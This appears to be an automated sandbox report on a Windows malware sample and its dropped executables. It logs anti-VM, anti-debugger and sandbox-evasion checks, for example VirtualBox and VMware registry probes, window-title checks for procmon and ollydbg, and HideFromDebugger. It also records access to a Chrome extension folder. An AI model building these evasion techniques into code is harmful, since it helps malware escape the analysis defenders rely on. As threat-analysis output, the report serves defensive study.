Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to evade analysis by execution special instruction which cause usermode exception

Show sources

Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Special instruction interceptor: First address: 0000000000DDFC16 instructions 0F0B caused by: Known instruction #UD exception
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Special instruction interceptor: First address: 0000000002701BBA instructions 0F3F070BC745FCFFFFFFFF33C033D2 caused by: Unknown instruction #UD exception
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Special instruction interceptor: First address: 0000000002702729 instructions 0F0B caused by: Known instruction #UD exception
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Special instruction interceptor: First address: 000000000270EE06 instructions 0F0B caused by: Known instruction #UD exception
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Special instruction interceptor: First address: 00000000027184C6 instructions 0F3F070BC745FCFFFFFFFF33C033D2 caused by: Unknown instruction #UD exception
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Special instruction interceptor: First address: 0000000002718AFD instructions 0F0B caused by: Known instruction #UD exception
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Special instruction interceptor: First address: 000000000270540F instructions 0F3F070B33C033D23945080F95C264 caused by: Unknown instruction #UD exception
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Special instruction interceptor: First address: 000000000270547C instructions 0FC7C8 caused by: Known instruction #UD exception

Query firmware table information (likely to detect VMs)

Show sources

Source: C:\Users\user\AppData\Local\Temp\12F1.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\305.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Show sources

Source: C:\Users\user\AppData\Local\Temp\305.exe

File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: hiftsuu, 0000000C.00000002.816174425.0000000002140000.00000004.00000001.sdmp	Binary or memory string: ASWHOOK
Source: v72n86vFFq.exe, 00000004.00000002.736834352.00000000004FB000.00000004.00000020.sdmp	Binary or memory string: ASWHOOKG

Checks if the current machine is a virtual machine (disk enumeration)

Show sources

Source: C:\Users\user\Desktop\v72n86vFFq.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\hiftsuu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\hiftsuu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\hiftsuu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\hiftsuu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\hiftsuu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\hiftsuu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\51B3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\51B3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\51B3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\51B3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\51B3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\51B3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Local\Temp\12F1.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Source: C:\Windows\explorer.exe TID: 5148	Thread sleep count: 576 > 30
Source: C:\Windows\explorer.exe TID: 1296	Thread sleep count: 133 > 30
Source: C:\Windows\explorer.exe TID: 5500	Thread sleep count: 190 > 30
Source: C:\Windows\explorer.exe TID: 6292	Thread sleep count: 317 > 30
Source: C:\Windows\explorer.exe TID: 4876	Thread sleep count: 79 > 30
Source: C:\Windows\explorer.exe TID: 4928	Thread sleep count: 58 > 30
Source: C:\Windows\explorer.exe TID: 4616	Thread sleep count: 319 > 30
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe TID: 6976	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44A2.exe TID: 4904	Thread sleep count: 50 > 30
Source: C:\Users\user\AppData\Local\Temp\2340.exe TID: 4180	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 6136	Thread sleep count: 36 > 30

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\explorer.exe

Window / User API: threadDelayed 576

Source: C:\Users\user\AppData\Local\Temp\44A2.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sqlite3[1].dll

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\12F1.exe

Code function: 9_2_00DF2823 rdtsc

Source: C:\Users\user\AppData\Local\Temp\44A2.exe

Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\AppData\Local\Temp\12F1.exe	File opened / queried: VBoxGuest
Source: C:\Users\user\AppData\Local\Temp\305.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\305.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\305.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\AppData\Local\Temp\12F1.exe

File opened: PhysicalDrive0

Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\44A2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\

Source: 305.exe, 00000016.00000002.943749543.0000000000BBE000.00000004.00000020.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
Source: Amcache.hve.19.dr	Binary or memory string: VMware
Source: Amcache.hve.19.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.19.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.19.dr	Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000006.00000000.700986229.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.19.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: WerFault.exe, 00000013.00000002.891900624.0000000004E80000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.884390501.0000000004EFD000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000002.892613042.0000000004EFE000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: 12F1.exe, 00000009.00000002.972625235.0000000002700000.00000040.00000001.sdmp	Binary or memory string: !"K\\.\VBoxGuest
Source: Amcache.hve.19.dr	Binary or memory string: VMware, Inc.me
Source: explorer.exe, 00000006.00000000.711355658.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000006.00000000.729575553.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000006.00000000.729664580.000000000A780000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: Amcache.hve.19.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: explorer.exe, 00000006.00000000.700986229.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.19.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.19.dr	Binary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
Source: explorer.exe, 00000006.00000000.711409801.0000000004791000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATA
Source: explorer.exe, 00000006.00000000.700986229.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.725672640.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.19.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.19.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.19.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.19.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.19.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.19.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.19.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: explorer.exe, 00000006.00000000.715546156.000000000A784000.00000004.00000001.sdmp	Binary or memory string: 6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}YY
Source: Amcache.hve.19.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: explorer.exe, 00000006.00000000.729664580.000000000A780000.00000004.00000001.sdmp	Binary or memory string: #{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}YY

Source: C:\Users\user\Desktop\v72n86vFFq.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\v72n86vFFq.exe

System information queried: ModuleInformation

Anti Debugging:

Tries to detect sandboxes and other dynamic analysis tools (window names)

Show sources

Source: C:\Users\user\AppData\Local\Temp\305.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\305.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\305.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\305.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\305.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\305.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\305.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\305.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Open window title or class name: windbgframeclass

Hides threads from debuggers

Show sources

Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\305.exe	Thread information set: HideFromDebugger

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Show sources

Source: C:\Users\user\Desktop\v72n86vFFq.exe	System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\hiftsuu	System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\51B3.exe	System information queried: CodeIntegrityInformation

Source: C:\Users\user\Desktop\v72n86vFFq.exe

Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 0_2_007E59D4 push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 8_2_004E0042 push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	Code function: 17_2_00401000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	Code function: 17_2_0040BDE0 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\v72n86vFFq.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process queried: DebugFlags
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\hiftsuu	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\305.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\305.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\305.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\305.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\305.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\51B3.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\12F1.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	File opened: SICE

Source: C:\Users\user\Desktop\v72n86vFFq.exe

Code function: 0_2_00422570 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\Users\user\Desktop\v72n86vFFq.exe

Code function: 0_2_004244B2 InterlockedIncrement,__itow_s,__invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,__snwprintf_s,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,GetFileType,_wcslen,WriteConsoleW,GetLastError,__invoke_watson_if_oneof,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,__invoke_watson_if_error,___crtMessageWindowW,

Source: C:\Users\user\Desktop\v72n86vFFq.exe

Code function: 0_2_00433FF0 GetLastError,GetCalendarInfoA,GetPrivateProfileStringA,GetLastError,CopyFileExA,GetSystemWow64DirectoryA,GetSystemWindowsDirectoryA,GetCPInfoExW,CreateNamedPipeA,GetProcessHeap,HeapValidate,GetPrivateProfileIntA,GetPrivateProfileStringA,

Source: C:\Users\user\AppData\Local\Temp\12F1.exe

Code function: 9_2_00DF2823 rdtsc

Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\12F1.exe

System information queried: KernelDebuggerInformation

Source: C:\Users\user\Desktop\v72n86vFFq.exe

Code function: 4_1_004027ED LdrLoadDll,

Source: C:\Users\user\AppData\Local\Temp\12F1.exe

Memory allocated: page read and write | page guard

Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 0_2_004342F0 lstrlenW,BackupWrite,_wscanf,__wremove,_puts,__putw,__wrename,_atexit,GetBinaryTypeW,SetCurrentDirectoryW,QueueUserWorkItem,GetBinaryTypeW,SetCurrentDirectoryW,LeaveCriticalSection,QueryDosDeviceA,TerminateJobObject,EnumDateFormatsExA,GlobalAddAtomW,CreateJobSet,WriteProfileStringW,GetFullPathNameA,VirtualAlloc,GetCompressedFileSizeW,WriteConsoleOutputAttribute,SetNamedPipeHandleState,lstrcpynW,GetFileAttributesA,FatalAppExitW,GetCurrentProcess,IsBadWritePtr,SetUnhandledExceptionFilter,QueueUserWorkItem,GetProcessHandleCount,QueueUserWorkItem,EnumResourceNamesW,DeleteTimerQueueTimer,SetFileApisToANSI,FindResourceA,AllocateUserPhysicalPages,GetBinaryTypeA,OpenMutexA,GetModuleFileNameW,CommConfigDialogA,HeapSize,_memset,CommConfigDialogA,HeapSize,GetComputerNameA,OpenMutexW,GetConsoleCursorInfo,OpenSemaphoreA,ResetWriteWatch,CreateActCtxA,LoadLibraryW,WriteProfileStringA,GetConsoleCursorInfo,OpenSemaphoreA,SetUnhandledExceptionFilter,ResetWriteWatch,ChangeTimerQueueTimer,SetFilePointer,SetCommState,EnumSystemLocalesA,_lclose,SetSystemTimeAdjustment,_memset,GetCommConfig,EnumDateFormatsW,LocalUnlock,WriteConsoleInputW,GetConsoleAliasExesLengthW,GetAtomNameA,IsBadStringPtrA,CreateIoCompletionPort,SearchPathA,SetConsoleCursorPosition,GetVolumePathNamesForVolumeNameW,SetConsoleCP,MoveFileExW,EnumDateFormatsExW,UnregisterWaitEx,SetSystemTime,SetThreadExecutionState,CreateHardLinkW,HeapWalk,lstrcpyA,SetFileValidData,OutputDebugStringA,FreeEnvironmentStringsW,FindNextFileA,FreeEnvironmentStringsW,FindFirstFileW,FindNextFileA,InterlockedDecrement,InterlockedDecrement,WaitNamedPipeW,WritePrivateProfileStringA,LoadLibraryW,DefineDosDeviceA,SetConsoleTitleW,GetPrivateProfileIntA,OutputDebugStringA,InterlockedPushEntrySList,CreateActCtxA,VirtualLock,lstrcatW,WriteProfileStringA,TerminateProcess,WritePrivateProfileSectionA,GlobalMemoryStatus,UnmapViewOfFile,_memset,GetDefaultCommConfigA,GetTempPathW,WriteFileGather,FindFirstFileW,ContinueDebugEvent,GetThreadSelectorEntry,FatalAppExitA,DeleteVolumeMountPointA,GetStringTypeA,CreateSemaphoreW,CreateSemaphoreW,SetLocalTime,EnumTimeFormatsA,FindResourceExA,GetPrivateProfileSectionNamesA,SetStdHandle,CloseHandle,CloseHandle,DeleteFileW,EnumDateFormatsA,CreateSemaphoreW,GetNumberFormatA,ReadConsoleOutputW,PeekConsoleInputW,BuildCommDCBW,UnregisterWaitEx,GlobalLock,GetVolumePathNamesForVolumeNameW